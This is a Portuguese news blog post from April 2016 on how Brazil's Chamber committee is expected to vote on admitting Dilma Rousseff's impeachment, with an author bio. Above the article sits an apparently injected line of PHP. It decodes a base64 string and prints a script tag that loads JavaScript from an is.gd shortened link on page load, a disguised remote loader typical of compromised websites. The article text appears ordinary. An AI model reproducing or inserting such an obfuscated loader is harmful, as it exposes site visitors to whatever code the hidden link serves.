$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Governo e oposição ainda não contam com maioria no colegiado que analisa o impeachment

Governo e oposição ainda não contam com maioria no colegiado que analisa o impeachment
03 Abr 2016

Do Correio Braziliense:

A primeira votação que definirá o futuro político da presidente Dilma Rousseff na comissão especial da Câmara que analisa a admissibilidade do processo de impeachment contra a petista deverá ter resultado apertado. Levantamento feito pelo Correio Braziliense/Estado de Minas com parlamentares mostra que hoje nem a oposição nem o governo atingiram maioria simples de 32 votos no colegiado, formado por 65 deputados. O presidente, Rogério Rosso (PSD-DF), só vota em caso de empate, por isso, não foi incluído na contagem. Sem contá-lo, mas incluindo o relator Jovair Arantes (PTB-GO) – cujo parecer tende a ser pelo impeachment –, há oito deputados indecisos. Dois deles, líderes de bancada – Aguinaldo Ribeiro (PP-PB) e Maurício Quintella (PR-MG) –, estão em meio a negociações de cargos com o governo, indicando que o Planalto pode levar dois votos ou mais se eles conseguirem virar as bancadas.

O objetivo do governo é barrar o impeachment já na Câmara e evitar que o Senado tenha de se debruçar sobre a decisão de abrir processo contra Dilma. Hoje, há mais parlamentares a favor do impeachment do que contra: 31 a 25. Mas, mesmo que avance na comissão, o resultado no plenário se torna cada vez mais incerto. Isso porque mais do que o governo precisar de 172 votos para garantir a vitória, a oposição necessita de 342 votos – equivalentes a dois terços dos 513 parlamentares – para enviar o impeachment ao Senado. Dilma deverá apresentar a defesa amanhã.

O PP, cuja maioria na comissão vota a favor do impeachment, deve ganhar mais espaço no governo. Gilberto Occhi é cotado para assumir a vice-presidência da Caixa. Em seu lugar entraria o suplente, deputado Cacá Leão (BA), que também é do PP. O Ministério da Saúde, ocupado por Marcelo Castro (PMDB-PI), que resiste em sair do cargo, deve ficar disponível e entregue à legenda. O PR ficaria com ao menos dois ministérios, um deles o dos Transportes.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *